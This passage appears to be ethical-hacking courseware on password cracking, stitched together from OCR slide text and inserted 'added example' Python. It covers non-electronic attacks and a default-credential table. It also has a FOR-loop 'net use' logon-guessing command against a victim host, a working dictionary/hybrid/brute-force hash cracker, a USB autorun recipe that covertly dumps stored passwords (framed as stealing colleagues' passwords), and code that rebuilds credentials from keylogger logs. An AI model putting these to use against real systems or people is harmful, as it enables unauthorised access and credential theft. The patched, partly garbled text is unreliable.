Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documents in a production environment. It executes the mathematically intensive password recovery code on the massively parallel compute units of modern graphics accelerators: when a compatible ATI or NVIDIA graphics card is present, GPU acceleration is used alongside the CPU-only mode, which makes recovery considerably faster than methods that use only the computer's main CPU. It supports password recovery for a variety of applications and file formats.

Features and benefits:

- Reduces password recovery time
- Distributed password recovery over LAN, Internet, or both
- Console management for flexible control from any networked PC
- Plug-in architecture allows for additional file formats
- Flexible queue control allows easy job management
- Schedule support for flexible load balancing
- Install and remove password recovery clients remotely
- Encrypted network communications
• 35. FIGURE 5.9: Elcomsoft Distributed Password Recovery screenshot (the Files view with per-file progress, elapsed time, current and average speed and status such as recovered, paused or not encrypted, and the attack settings: character groups, dictionary, prefix/suffix, mutation and length)
• 36. Non-Electronic Attacks

- Shoulder surfing: looking at the user's keyboard or screen while he or she logs in
- Dumpster diving: searching the user's trash bins, printer trash bins, and desk for sticky notes and other sensitive information
- Social engineering: convincing people to reveal confidential information

Non-electronic attacks are also called non-technical attacks: this kind of attack requires no technical knowledge of how to intrude into another's system, which is why it is named non-electronic. There are four types of non-electronic attack: social engineering, shoulder surfing, keyboard sniffing, and dumpster diving.

Dumpster Diving

Dumpster diving exploits a substantial failure in computer security: the very information that people value, protect, and diligently secure can be obtained by almost anyone willing to go through the garbage. It lets an attacker gather information about a target's passwords by looking through the trash. This low-tech attack has many implications. Dumpster diving was quite popular in the 1980s, when there was less security around discarded material than there is today.

The term "dumpster diving" refers to any useful information found in and taken from places where it has been discarded. These places include trash cans, curbside containers, dumpsters and the like, from which the information can be obtained for free. Curious or malicious attackers may find password files, manuals, sensitive documents, reports, receipts, credit card numbers, or diskettes that have been thrown away.
• 37. Simply examining the waste that has been dumped in dumpster areas can be helpful to attackers, and there is ample evidence to support this. Such information was discarded with no thought to whose hands it might end up in. Attackers can use this data to gain unauthorized access to others' computer systems, or the objects found can prompt other types of attack, such as social engineering.

Shoulder Surfing

Shoulder surfing is when an intruder stands inconspicuously near a legitimate user and watches as the password is entered. The attacker simply looks at the user's keyboard or screen while he or she logs in, and watches whether the user glances at the desk for a password reminder or for the password itself. This is possible only when the attacker is physically close to the target. The same attack happens in a grocery store checkout line when a potential victim swipes a debit card and enters the PIN; many of these Personal Identification Numbers are only four digits long.

Eavesdropping refers to secretly listening to someone's conversation; passwords can be determined by secretly listening to password exchanges. If an attacker fails to get your password by guessing, there are other ways to get it. "Password sniffing" is one alternative. On a shared-medium (broadcast) network, such as one built on hubs, every frame a host transmits can be read by every host connected to that segment. In normal operation, every host other than the intended recipient notices that a frame is not addressed to it and ignores it. A host can, however, be put into promiscuous mode to capture every frame on the wire, and in this way read traffic that was never meant for it. Attackers have tools to do this, and then scan all captured traffic for passwords. Two caveats a tester should keep in mind: on a switched network the attacker first has to make the traffic reach his or her port (for example by ARP spoofing or a mirror port), and only protocols that carry the password in clear text, such as Telnet, FTP, and HTTP basic authentication, actually expose it. If you log in to a computer across a network and a machine on that network has been compromised in this way, you may be handing your password to the attacker. Using this technique, attackers have collected thousands of passwords by breaking into computers connected to heavily used networks.

Social Engineering

In computer security, social engineering is the term for a non-technical kind of intrusion. It typically relies heavily on human interaction and often involves tricking people into breaking normal security procedures. A social engineer runs a "con game" to defeat those procedures. For example, an attacker using social engineering to break into a computer network would try to gain the trust of someone authorized to access the network, and then try to extract information that compromises the network's security.
• 38. Social engineering is the practice of obtaining confidential information by deceiving or manipulating people. An attacker can pose as a user or a system administrator in order to obtain a password from a user. It is natural for people to be helpful and trusting, and most people make an effort to build amicable relationships with their friends and colleagues; social engineers take advantage of this tendency. Another trait social engineering relies on is people's inability to keep up with a culture that depends heavily on information technology: most people are not aware of the value of the information they possess, and many are careless about protecting it. Attackers take advantage of this fact as well. Social engineers habitually search dumpsters for valuable information. A social engineer would have a tougher time getting the combination to a safe, or even the combination to a health club locker, than a password. The best defense is to educate, train, and create awareness.

Keyboard Sniffing

Keyboard sniffing captures the password as the target types it, using keyloggers: either a hardware device placed inline with the keyboard or software that hooks the keystrokes.
• 39. Default Passwords

Source: http://securityoverride.org

A default password is the password a manufacturer supplies with new password-protected equipment. It normally allows the device to be accessed during its initial setup, and it remains in force until an administrator changes it; because the factory credentials are published, a device still using them can be logged into by anyone who looks them up. Online tools that can be used to search for default passwords include:

- http://cirt.net
- http://default-password.info
- http://www.defaultpassword.us
- http://www.passwordsdatabase.com
- https://w3dt.net
- http://www.virus.org
- http://open-sez.me
- http://securityoverride.org
- http://www.routerpasswords.com
- http://www.fortypoundhead.com
• 40. FIGURE 5.10: Default Password screenshot

TABLE 5.1: Sample entries from an online default password list

Vendor | Model                       | Version             | Access Type | Username | Password
3COM   | CoreBuilder                 | 7000/6000/3500/2500 | Telnet      | Debug    | Synnet
3COM   | CoreBuilder                 | 7000/6000/3500/2500 | Telnet      | Tech     | Tech
3COM   | HiPerARC                    | v4.1.x              | Telnet      | Adm      | (none)
3COM   | LANplex                     | 2500                | Telnet      | Debug    | Synnet
3COM   | LANplex                     | 2500                | Telnet      | Tech     | Tech
3COM   | LinkSwitch                  | 2000/2700           | Telnet      | Tech     | Tech
3COM   | NetBuilder                  |                     | SNMP        |          | ILMI
3COM   | Office Connect ISDN Routers | 5x0                 | Telnet      | n/a      | PASSWORD
3COM   | SuperStack II Switch        | 2200                | Telnet      | debug    | Synnet
3COM   | SuperStack II Switch        | 2700                | Telnet      | tech     | Tech
3COM   | OfficeConnect 812 ADSL      |                     | Multi       | adminttd | adminttd
Huawei | E960                        |                     | Multi       | Admin    | Admin

Because these lists are public, the check is trivial: a device that still answers to its factory credentials should be treated as already compromised, and changing them belongs in the commissioning checklist.
• 41. Manual Password Cracking (Guessing)

- Attempts are slow and infrequent, because every guess is a live logon
- The failure rate is high

Manual password cracking means attempting to log on with different passwords; guessing is its key element. The password is the value an attacker needs in order to access the system, and obtaining it is normally the first step of system hacking, to be followed by escalating privileges, executing applications, hiding files, and covering tracks. Attackers make many attempts to crack passwords in order to intrude into a target's system. Passwords can be cracked manually or with automated tools, methods, and algorithms; even a manual attack can be automated with a simple FOR loop.

Manual password cracking involves the following steps:

- Find a valid user
- Create a list of possible passwords
- Rank passwords from high probability to low
- Key in each password until the correct password is discovered

An attacker can also create a script file that tries each password in a list; this is still considered manual cracking. The failure rate of this type of attack is high, and against a target with an account lockout policy it is also noisy: every wrong guess is a failed logon at the target, and enough of them lock the account.
• 42. Manual Password Cracking Algorithm

In its simplest form, password guessing can be automated with a FOR loop. In the example that follows, the attacker creates a text file of username and password pairs, and the FOR loop iterates over it. The main loop extracts the username and password from each line of the text file, which serves as the dictionary:

[file: credentials.txt]
administrator ""
administrator password
administrator administrator
[etc.]

From a directory that can access the text file, the command is typed as follows (each trailing ^ continues the command onto the next "More?" prompt line):

C:\>FOR /F "tokens=1,2*" %i in (credentials.txt) ^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i ^
More? 2>>nul ^
More? && echo %time% %date% >> outfile.txt ^
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
C:\>type outfile.txt

outfile.txt contains a username and password only for those lines of credentials.txt that were correct, because the && chains run the echo commands only when net use succeeds. A successful attempt also leaves an open IPC$ session from the attacker's system to the victim server (net use \\victim.com\IPC$ /delete closes it). On the defending side, every attempt, successful or not, is a logon event at the target, so an account lockout threshold or alerting on bursts of failed logons defeats or exposes this loop.
• 43. Automatic Password Cracking Algorithm

- Find the hashing algorithm used
- Create a list of the possible passwords
- Verify whether there is a match for each user ID
- Repeat the cycle until the correct password is discovered

As security awareness increased, most systems began running passwords through some type of algorithm to generate a hash. This hash is usually more than a rearrangement of the original password: it is a one-way hash, a string of characters that cannot be reversed into its original text. The vulnerability does not arise from the hashing process but from the way the hashes are stored and compared. Most systems never decrypt a stored password at authentication time; they store only the one-way hash. During the local login process, the password entered is run through the algorithm, the resulting one-way hash is compared with the hash stored on the system, and if the two are identical the system assumes the proper password was used. Therefore, all an attacker has to do to crack a password is obtain a copy of the one-way hash stored on the server and then run candidates through the same algorithm until one produces a matching hash. Unsalted hashes make this cheaper still: one hash computation tests a candidate against every user in the store at once, and precomputed tables can be reused across targets.

Most systems, Microsoft, UNIX, and Netware among them, have publicly documented their hashing algorithms. Attackers combine attack methods to reduce the time involved in cracking a password, and the Internet provides freeware password crackers for NT, Netware, and UNIX.
• 44. Password lists can be fed to these crackers to carry out a dictionary attack. In its simplest form, automation involves finding a valid user and the particular hashing algorithm in use, obtaining the hashed passwords, creating a list of all possible passwords, hashing each word, and checking for a match against each known user ID. The process is repeated until the desired results are obtained or all options are exhausted. An automatic password cracking algorithm includes the following steps:

- Find a valid user
- Find the hashing algorithm used
- Obtain the hashed passwords
- Create a list of possible passwords
- Hash each word
- See if there is a match for each user ID

Performing Automated Password Guessing

If a manual attack fails, the attacker can choose to automate the process. Several free programs assist in this effort, among them Legion, John the Ripper, and the NetBIOS Auditing Tool (NAT). The simplest of these automation methods takes advantage of the net command in a simple loop using the NT/2000 shell's FOR command. All the attacker has to do is create a simple username and password file (username first, then password on each line) and reference it within a FOR command:

C:\>FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %j /u:%i

Automated password attacks can be categorized as follows:

- A simple dictionary attack loads a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper and runs it against the user accounts the application locates. A dictionary attack succeeds only if the password is in the list; it is fast precisely because the list is tiny compared with the full key space.
- The brute force method is the most inclusive, although slow. It tries every possible letter and number combination; its running time grows exponentially with the password length and the size of the character set.
- A hybrid approach combines features of both methods. It usually starts with a dictionary and then tries combinations such as two words together or a word and numbers.

Users tend to have weak passwords because they do not know what constitutes a strong password and therefore do not know how to create strong passwords for their accounts. As shown, this leaves passwords open to attack.
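The hash-and-compare loop from the previous slide and the three attack classes above (dictionary, then hybrid, then brute force) as one added Python example; this is not code from L0phtCrack, John the Ripper or the course material. The "stolen" hash store is constructed here as unsalted SHA-256 hex digests keyed by username; the four-word dictionary, the hybrid mutation rules (case variants, common digit suffixes, recent years) and the brute-force character set are assumptions chosen to keep the run short.

```python
"""Offline hash cracking: dictionary, then hybrid, then brute force.

Constructed example.  STOLEN_HASHES stands in for a copied one-way hash
store (unsalted SHA-256 hex, keyed by username); WORDLIST is a tiny
dictionary.  Each candidate is hashed once and compared against every
uncracked user, which is what makes unsalted stores cheap to attack.
"""
import hashlib
import itertools
import string
from typing import Dict, Iterable, Iterator, List, Tuple


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


# Constructed "stolen" hashes; the plaintexts appear here only to build the sample.
STOLEN_HASHES: Dict[str, str] = {
    "alice": sha256_hex("summer"),      # falls to the plain dictionary
    "bob":   sha256_hex("Summer2012"),  # falls to the hybrid rules
    "carol": sha256_hex("x9!"),         # short enough for brute force
}
WORDLIST: List[str] = ["password", "summer", "winter", "admin"]  # constructed dictionary
BRUTE_CHARSET = string.ascii_lowercase + string.digits + "!@#"   # assumed character set
YEARS = [str(y) for y in range(2010, 2013)]
SUFFIXES = ["", "1", "12", "123"] + YEARS

Cracked = Dict[str, Tuple[str, str]]  # user -> (password, method)


def try_candidates(hashes: Dict[str, str], candidates: Iterable[str],
                   method: str, cracked: Cracked) -> None:
    """Hash each candidate once and check it against every still-uncracked user."""
    remaining = {u: h for u, h in hashes.items() if u not in cracked}
    for cand in candidates:
        if not remaining:
            return
        h = sha256_hex(cand)
        for user in [u for u, stored in remaining.items() if stored == h]:
            cracked[user] = (cand, method)
            del remaining[user]


def hybrid_candidates(words: Iterable[str]) -> Iterator[str]:
    """Dictionary words with case variants and common suffixes (word+digits, word+year)."""
    for word in words:
        for base in (word, word.capitalize(), word.upper()):
            for suffix in SUFFIXES:
                yield base + suffix


def brute_force_candidates(charset: str, max_len: int) -> Iterator[str]:
    """Every string up to max_len; cost is sum(len(charset)**n), exponential in length."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def crack_all(hashes: Dict[str, str], wordlist: List[str] = WORDLIST,
              brute_max_len: int = 3) -> Cracked:
    """Run the cheap attacks first; brute force only what survives them."""
    cracked: Cracked = {}
    try_candidates(hashes, wordlist, "dictionary", cracked)
    try_candidates(hashes, hybrid_candidates(wordlist), "hybrid", cracked)
    try_candidates(hashes, brute_force_candidates(BRUTE_CHARSET, brute_max_len),
                   "brute-force", cracked)
    return cracked


if __name__ == "__main__":
    for user, (password, how) in crack_all(STOLEN_HASHES).items():
        print(f"{user}: {password!r} via {how}")
```

The ordering matters: the dictionary costs four hashes, the hybrid stage a few hundred, and three-character brute force about sixty thousand; a password that is long and absent from the word list survives all three, which is the whole argument for length and for salting the store.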
  • 45. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Stealing P assw ords Using USB D rive 1 Attacker c EH U rtifM User itkMjl IlMhM Passwords PassView is executed in th e background and passwords w ill be stored in th e .TXT files in th e USB drive Inse rt th e USB drive and th e autorun w in d o w w ill pop-up ( if enabled) C ontents o f launch, bat D ownload PassView, a start p s p v .exe/stext p s p v .txt password hacking to o l Create autorun.inf in USB drive Copy th e downloaded files to [autorun] e n = l a u n c h .b a t USB drive Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. £ W < S tealing P a ssw o rd s U sing USB D rives ‫>־‬ z J S te a lin g p a s s w o r d s u sin g a USB d r i v e is a p h y s ic a l a p p r o a c h f o r h a c k in g p a s s w o r d s sto re d in a c o m p u te r. A tta cke rs can ste a l passw ord s u s in g a USB d r iv e and d iffe re n t a p p lic a tio n s . P e o p le w h o h a ve m u l t i p l e o n l i n e a c c o u n ts u s u a lly s to r e t h e i r u s e r n a m e s and p a s s w o r d s as a b a c k u p t o use if t h e y f o r g e t t h e m . You can r e c o v e r o r s te a l such c r e d e n t i a l s u sin g a USB d riv e . T h e p h y s ic a l a p p r o a c h m a t t e r s a l o t f o r h a c k in g p a s s w o r d s . O n e can ste a l p a s s w o r d s u sin g a USB d r iv e a n d a p p lic a tio n s . This m e t h o d is a p p lic a b le f o r h a c k in g s t o r e d p a s s w o r d s in a n y c o m p u t e r . M o s t o f t h e p e o p le s ig n in g u p f o r a la rg e n u m b e r o f w e b s i t e s u s u a lly s to r e t h e i r passw ords on th e c o m p u te r in o r d e r t o re m e m b e r th e m . O n e can t r y re c o v e rin g th e m a u t o m a t i c a l l y u sin g a USB d riv e . 
This requires plugging the USB drive into any port of the computer on which the passwords are stored. The trick applies to Windows XP, Windows 7, Windows Vista, and Windows 2000. All the applications included are portable and light enough to be copied to the USB drive in a few seconds. Stored Messenger passwords can be harvested the same way. Using these tools and a USB pen drive you can build a toolkit that extracts passwords from the target computer. Stealing passwords using a USB device is carried out with the following steps:

1. You need a password recovery tool such as PassView (pspv.exe).
2. Copy the downloaded .exe files of the password recovery tools to the USB drive.
3. Create a Notepad document with the following content:

[autorun]
open=launch.bat

Save the document as autorun.inf and copy it to the USB drive.
4. Open Notepad and write the following:

start pspv.exe /stext pspv.txt

Save the file as launch.bat and copy it to the USB drive. The /stext switch tells the tool to write its results to the named text file instead of displaying them.
5. Insert the USB drive; the AutoRun window pops up if AutoRun is enabled for removable drives. Windows 7, and Windows XP/Vista with update KB971029 applied, ignore autorun.inf on USB mass-storage devices, so on those systems launch.bat has to be started by hand.
6. The password recovery tool executes in the background and the passwords are stored in .TXT files on the USB drive.

In this way you can create your own USB password recovery toolkit and use it to steal the stored passwords of friends or colleagues without their knowledge. The process takes only a few seconds to retrieve the passwords.

FIGURE 5.11: Stealing Passwords Using USB Drives
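The defender's check for the recipe above: given the files on a removable volume, follow autorun.inf into the launcher it names and list every program that would run, with its switches, without executing anything. This is an added example, not code from the CEH courseware; the volume contents are constructed from the page's recipe (the extra icon= key is an assumption, included to show that non-launch keys are ignored), and the tool binary itself is omitted.

```python
"""Added example (not from the CEH courseware): trace what an autorun.inf on a
removable volume would launch, following it into the batch file it names.
"""
from typing import Dict, List, Tuple

# autorun.inf keys that directly name a program to run on insertion
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Parse the INI-style autorun.inf into {section: [(key, value), ...]}.
    Section and key names are lower-cased; duplicate keys are preserved."""
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip().lower(), value.strip()))
    return sections


def launched_commands(autorun_text: str) -> List[str]:
    """Every command line the [autorun] section asks Windows to execute:
    open=, shellexecute=, and any shell\\<verb>\\command= context-menu verb."""
    commands = []
    for key, value in parse_autorun(autorun_text).get("autorun", []):
        if key in LAUNCH_KEYS:
            commands.append(value)
        elif key.startswith("shell\\") and key.endswith("\\command"):
            commands.append(value)
    return commands


def batch_invocations(batch_text: str) -> List[str]:
    """Program invocations in a .bat/.cmd file, with 'start' and comments stripped."""
    invocations = []
    for raw in batch_text.splitlines():
        line = raw.strip()
        lower = line.lower()
        if not line or lower.startswith(("rem ", "::", "@echo")):
            continue
        if lower.startswith("start "):
            line = line[len("start "):].strip()
        invocations.append(line)
    return invocations


def trace_launch_chain(volume: Dict[str, str]) -> List[str]:
    """volume maps file name (at the volume root) -> text contents. Returns the
    chain autorun.inf -> launcher -> tool so the analyst sees what would run
    and with which switches, without executing anything."""
    files = {name.lower(): body for name, body in volume.items()}
    chain: List[str] = []
    inf = files.get("autorun.inf")
    if inf is None:
        return chain
    for cmd in launched_commands(inf):
        chain.append(f"autorun.inf -> {cmd}")
        parts = cmd.split()
        target = parts[0].strip('"').lower() if parts else ""
        if target.endswith((".bat", ".cmd")) and target in files:
            for inv in batch_invocations(files[target]):
                chain.append(f"{target} -> {inv}")
    return chain


# Constructed volume contents following the page's recipe; the tool binary is
# not included because only the launch chain matters here.
USB_VOLUME = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nicon=folder.ico\n",
    "launch.bat": "@echo off\nstart pspv.exe /stext pspv.txt\n",
}

if __name__ == "__main__":
    for step in trace_launch_chain(USB_VOLUME):
        print(step)
```

The same parser covers the other ways an autorun.inf can start a program (shellexecute= and shell\verb\command= entries), which is what to look for on a drive found in a car park. Note that Windows 7, and Windows XP/Vista with KB971029 installed, do not honour autorun.inf on USB mass-storage devices at all, so on those systems the file is evidence of intent rather than an automatic launch.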
Stealing Passwords Using Keyloggers

- Keyloggers provide the easiest and most effective means of stealing all of a victim's user names and passwords.
- If an attacker succeeds in infecting a victim's machine with a Trojan that has keylogging features, he or she can instruct the Trojan server to log and send back all user credentials to the attacker's machine.

[Slide diagram (Figure 5.12): the attacker infects the victim's local PC with a software keylogger; the victim logs on to the domain server with his credentials; the keylogger sends the login credentials to the attacker; the attacker gains access to the domain server.]

Whenever an attacker needs to crack something, he or she usually looks for the weak points in the whole process. A password is the piece of data submitted to a system or application to gain access to it. Choosing complex passwords makes accounts more secure and the attacker's job harder, but not impossible: passwords are usually entered through the keyboard, so an attacker who has software or some other mechanism that logs the keystrokes and sends the report back can recover the passwords easily, however complex they are.
The programs that do this are keyloggers, a kind of malware. Keyloggers expose all the keystrokes entered by the target, including user names and passwords for any website. A remote keylogger gives an attacker access not only to the victim's email and online accounts but can compromise financial details as well. Attackers use keyloggers to capture a specific piece of information such as a user name or password. The pictorial representation shows how attackers steal passwords using keyloggers.
FIGURE 5.12: Stealing Passwords Using Keyloggers

When stealing passwords this way, the attacker first infects the victim's local PC with a software keylogger. When the victim logs on to the domain server with his or her credentials, the keylogger automatically sends those login credentials (user name and password) to the attacker without the victim's knowledge. Once the attacker has the victim's login credentials, he or she logs on to the domain server and may perform any action.
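The collection-side step that makes the flow above defeat password complexity: turning a keylogger's raw key-event stream back into the fields the victim typed, Backspace corrections and Shift included. The same routine lets a responder who recovers such a log judge what was exposed. This is an added example, not code from the CEH courseware or from any keylogger; the log format (printable keys as characters, special keys as [NAME] tokens), the sample log, and the rule that the first two fields of a logon form are user name and password are assumptions constructed for the example.

```python
"""Added example (not from the CEH courseware): rebuild typed form fields
from a keylogger's raw key-event log. The log format is an assumption:
printable keys are recorded as characters, special keys as [NAME] tokens.
"""
from typing import Dict, Iterator, List

# US keyboard layout: what Shift turns the digit row into
SHIFT_DIGITS = dict(zip("1234567890", "!@#$%^&*()"))


def tokenize(log: str) -> Iterator[str]:
    """Yield one printable character or one [SPECIAL] token at a time."""
    i = 0
    while i < len(log):
        if log[i] == "[":
            end = log.find("]", i)
            if end != -1:
                yield log[i:end + 1].upper()
                i = end + 1
                continue
        if log[i] not in "\r\n":   # line breaks belong to the logger, not the victim
            yield log[i]
        i += 1


def reconstruct_fields(log: str) -> List[str]:
    """Rebuild each field as the application finally saw it: Backspace removes
    the previous character, Shift modifies the next key, Tab/Enter end a field."""
    fields: List[str] = []
    buf: List[str] = []
    shift = False
    for tok in tokenize(log):
        if tok in ("[TAB]", "[ENTER]"):
            fields.append("".join(buf))
            buf = []
        elif tok == "[BACKSPACE]":
            if buf:
                buf.pop()
        elif tok == "[SHIFT]":
            shift = True
            continue                      # keep it pending for the next key
        elif tok.startswith("["):
            pass                          # CTRL, ALT, arrows: no text
        else:
            buf.append(SHIFT_DIGITS.get(tok, tok.upper()) if shift else tok)
        shift = False
    if buf:
        fields.append("".join(buf))
    return fields


def extract_credentials(log: str) -> Dict[str, str]:
    """Assumption: on a logon dialog the first two fields submitted are the
    user name and the password, as on the Windows logon and most web forms."""
    fields = reconstruct_fields(log)
    if len(fields) < 2:
        return {}
    return {"username": fields[0], "password": fields[1]}


# Constructed sample: the victim types a user name, tabs to the password
# field, corrects a typo, and presses Enter. The password contains upper
# case, a symbol and digits, yet falls out of the log unchanged.
SAMPLE_LOG = "jsmith[TAB][SHIFT]p[SHIFT]2ssw0rf[BACKSPACE]d[SHIFT]1[ENTER]"

if __name__ == "__main__":
    print(extract_credentials(SAMPLE_LOG))
```

Password complexity rules are irrelevant here: the reconstruction needs no guessing, which is why the countermeasure against keyloggers is keeping the endpoint clean and using a second factor, not a longer password.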